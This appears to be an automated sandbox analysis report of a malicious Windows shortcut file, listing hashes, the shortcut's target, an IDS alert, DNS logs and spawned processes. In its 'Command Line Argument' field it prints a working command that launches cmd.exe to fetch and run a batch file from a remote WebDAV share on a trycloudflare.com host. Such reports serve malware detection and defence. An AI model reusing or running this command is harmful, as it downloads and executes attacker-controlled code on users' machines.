SHA-256: | 569E17E6BB0D00D37BA50D0E63827FB0FBB31785EF75C9920C315EBFDEA4C9A0 |
SHA-512: | F641B6553A2BBAF322DC0DD4650E5E589526736ADE6E5B19A09743113EB603C78CB880DA58495C715BCF2EDA830EEBC2159D4B3F44F66ECC2A97AC416BCB0901 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.5118522866203765 |
TrID: |
|
File name: | dial2.Ink.lnk |
File size: | 2'025 bytes |
MD5: | e12f74c1f35c4f7d07f5615757729526 |
SHA1: | 809096004d6255f491f6d477d94d72bd46b9e023 |
SHA256: | d577c12707f3c3c4aed546e08525caf2e24c4cebc8ab1658c6d870c09177bcbf |
SHA512: | 3a9edb1f90765e8f236e8c2fcc5c4f3e6e4277f1d2658188a9410928c4e62dc15b79b5e6d1e338e6eb3c64eecae8fad53e0616c7155bfec0041bcc80e1c730a9 |
SSDEEP: | 48:8EJoWcufOX4jjJ2JXjJ2Keh4UWJBE2Fe7:8uodX43JCzJneOUCBE8e7 |
TLSH: | 5441A6062BFE5B20F7F30F7019B556B59E32789BAA91DB2D4148010E09B4F14EDA4F67 |
File Content Preview: | L..................F.... ....Jx.......}.......}......@......................5....P.O. .:i.....+00.../C:\...................V.1.....GX....Windows.@......./M.1GX.............................!w.W.i.n.d.o.w.s.....Z.1.....SXc7..System32..B......./M.1SXc7...... |
Icon Hash: | 74f0e4e4e4e1e1ed |
General | |
---|---|
Relative Path: | ..\..\..\..\Windows\System32\cmd.exe |
Command Line Argument: | /c start "" /min \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\file.bat & start \\boy-such-icon-positive.trycloudflare.com@SSL\DavWWWRoot\1.jpg |
Icon location: | \\diatruiest.com@80\sniptool\work\a.ico |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/24/24-11:03:00.227669 | UDP | 2052731 | ET TROJAN DNS Query to Malware Delivery Related Domain (boy-such-icon-positive .trycloudflare .com) | 50669 | 53 | 192.168.2.7 | 1.1.1.1 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 24, 2024 11:03:00.227669001 CEST | 50669 | 53 | 192.168.2.7 | 1.1.1.1 |
May 24, 2024 11:03:00.253319025 CEST | 53 | 50669 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
May 24, 2024 11:03:00.227669001 CEST | 192.168.2.7 | 1.1.1.1 | 0xe52c | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
May 24, 2024 11:03:00.253319025 CEST | 1.1.1.1 | 192.168.2.7 | 0xe52c | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 05:02:59 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff687c80000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 1 |
Start time: | 05:02:59 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 12 |
Start time: | 05:03:12 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff700510000 |
File size: | 71'680 bytes |
MD5 hash: | EF3179D498793BF4234F708D3BE28633 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 13 |
Start time: | 05:03:12 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7724f0000 |
File size: | 499'200 bytes |
MD5 hash: | 3AE6BFDF0257B303EDD695DA183C8462 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 17 |
Start time: | 05:03:18 |
Start date: | 24/05/2024 |
Path: | C:\Windows\System32\netsh.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff67c350000 |
File size: | 96'768 bytes |
MD5 hash: | 6F1E6DD688818BC3D1391D0CC7D597EB |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |